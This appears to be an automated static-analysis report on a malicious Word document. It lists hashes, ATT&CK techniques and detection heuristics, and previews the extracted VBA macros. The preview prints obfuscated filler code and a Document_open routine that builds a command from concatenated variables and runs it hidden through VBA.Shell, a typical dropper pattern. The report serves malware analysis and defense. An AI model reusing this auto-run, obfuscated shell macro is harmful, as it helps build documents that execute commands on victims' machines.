Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 75f146639bc27609…

MALICIOUS

Office (OLE)

Size: 175.9 KB
Created: 2018-07-23 13:37:00
Authoring application: Microsoft Office Word
First seen: 2019-01-20
MD5: ac62aba5c2a78d092c14159fdde447d6
SHA-1: 2b02c94d77deda08e17586838cfa28a2cf1f33b8
SHA-256: 75f146639bc276090d18a2fb53913e06d5dd6583f786f58f5e0229a6e8b79b86
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or to download and run additional payloads. The 'Document_Open' macro further indicates that this code is designed to run automatically when the document is opened. Apart from a standard OOXML schema URL found in the document body, no download URLs or executable payloads were extracted; the combination of these indicators nonetheless strongly suggests downloader or dropper functionality.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-6989445-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-6989445-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 25218 bytes
SHA-256: 036e8c13853aaeb244d069d2469e893be2ee1a95ebe67fa07a23d0df844c8a44
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "hzqoUrQTfEOO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function rjDMdTWbjwIsI()
On Error Resume Next
   If PoXtj Xor zVwMz Then
      zTTfz = 134100329
   End If
   If djYPSS Xor aftIUZ Then
      zXJji = 134100329
   End If
   If SPczw Xor hWjlb Then
      OsXiT = 134100329
   End If
   If rKHzjz Xor IPRLV Then
      qbrYF = 134100329
   End If
   If lUbnsX Xor zvJwPW Then
      lVQQl = 134100329
   End If
End Function
Private Function ZDNfTBnRmYIi()
On Error Resume Next
   If qSQqjc Xor zpjSW Then
      SbFEV = 134100329
   End If
   If aNdMw Xor UphTmT Then
      YzvFXF = 134100329
   End If
   If GSdnq Xor JiOcfK Then
      qdszW = 134100329
   End If
   If iMDTLo Xor JzkEjV Then
      TvAZF = 134100329
   End If
   If QrWKSi Xor UtXGfj Then
      Itqcp = 134100329
   End If
End Function
Private Function ZNGSwzA()
On Error Resume Next
   If qukql Xor jlfvOK Then
      MzLGS = 134100329
   End If
   If aIUFM Xor EzqtN Then
      dOYXH = 134100329
   End If
   If OnwIb Xor wFJKB Then
      IbRGcH = 134100329
   End If
   If lCGcPM Xor fkwcc Then
      RnLXu = 134100329
   End If
   If ZSjdO Xor jwwhvo Then
      dqSdAs = 134100329
   End If
   If Nvopu Xor oMIvP Then
      FzvDT = 134100329
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If fAtJvq = PNFHCq Then
      VWXIAw = ITSti * 102768365
   End If
   If pMbksN = pjUwi Then
      Alajw = HorPAI * 102768365
   End If
   If zopTU = YcEDuu Then
      LYlwbo = lmwcL * 102768365
   End If
   If jwjjk = hiTPk Then
      Ajwjt = rTHjP * 102768365
   End If
VBA.Shell "" + hbQRFPaAiW + pjqCJRbMXsm + CVar("C") + drzwabQriIFDhd + kwJlESIBNrr + BonnVRGw + tWEtX + uZruUPj + dYNsMHc + fUTKiDjEVNPnr, 0
   If DNTYE = jVUhlJ Then
      bDdjj = SLZEMP * 102768365
   End If
   If udIGI = UmUUSz Then
      KmDpf = BTLbb * 102768365
   End If
   If uAAPml = pznEM Then
      wzwcst = dSkfE * 102768365
   End If
End Sub
Private Function BcPUKmRL()
On Error Resume Next
   If ZGthW = rFpzY Then
      WiAwY = XknzjA * 102768365
   End If
   If hvjUMf = KtVErO Then
      zhzAjB = mmSTKF * 102768365
   End If
   If kiiYqW = EOaWj Then
      GUOun = tNhFj * 102768365
   End If
   If uIQBC = dCfNFQ Then
      mQtQs = DPMmL * 102768365
   End If
   If NHwaN = jnhHj Then
      RaAGKN = VdoQc * 102768365
   End If
End Function
Private Function SanpbjzMTYiN()
On Error Resume Next
   If iWsCa = ZmaUAj Then
      GjWZu = cMlqiD * 102768365
   End If
   If KiscXq = HJujq Then
      mbXcJ = wwMAcT * 102768365
   End If
   If bbFpj = HYhzkv Then
      TiFrD = ukFqZ * 102768365
   End If
   If jwiQIp = wGYpz Then
      vHtWYQ = VnvHS * 102768365
   End If
   If LBlFjz = fhAEt Then
      aLQtJ = fMkwwZ * 102768365
   End If
End Function
Private Function QjDZuASz()
On Error Resume Next
   If ildsRJ = nfRmoR Then
      OnYUKo = okqQtj * 102768365
   End If
   If jDRoz = UqnQS Then
      QIPMol = WsQXvb * 102768365
   End If
   If PvuXPF = cFkiJ Then
      TzwXK = mijcT * 102768365
   End If
   If TPjVNd = vMjLhA Then
      QdFszv = hmoED * 102768365
   End If
   If ZdGElr = slGvnj Then
      KdjrX = uKiMh * 102768365
   End If
End Function


Attribute VB_Name = "RWkfRXKkffYmW"
Private Function nESfuLiw()
On Error Resume Next
   If cEJaZz = Wmdstw Then
      For vIhnTc = 155 To 516331127
         nAHOY = 21658 + uEDztO / (46281 * DsjdwS * 67395 * FuqfQ)
      Next
      Else
      TtHBr = (DCLAml / hasAkS)
   End If
   If qQHTPD = vkNlu Then
      For EjONfj = 155 To 516331127
         pfiAK = 38586 + CJEloB / (45648 * OAWOZL * 56615 * zwlzN)
      Next
      Else
      XVXKO = (KmHIvH / mjbws)
   End If
   If iMzCM = DHmMB Then
      For wjEqJ = 155 To 516331127
         SAqXC = 31756 + koKVD 
... (truncated)